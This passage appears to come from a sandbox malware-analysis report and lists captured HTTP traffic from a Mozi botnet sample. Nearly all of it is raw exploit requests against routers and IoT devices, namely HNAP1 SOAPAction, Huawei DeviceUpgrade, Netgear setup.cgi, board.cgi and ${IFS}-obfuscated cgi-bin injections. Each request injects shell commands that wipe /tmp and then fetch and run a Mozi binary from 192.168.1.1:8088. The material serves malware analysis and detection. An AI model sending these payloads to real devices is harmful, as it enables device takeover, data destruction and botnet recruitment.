                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 50.86.194.175:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 216.215.126.155:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 41.82.153.233:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 42.222.1.216:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 19.120.175.194:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 193.94.110.72:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 100.239.233.236:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 149.95.10.228:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
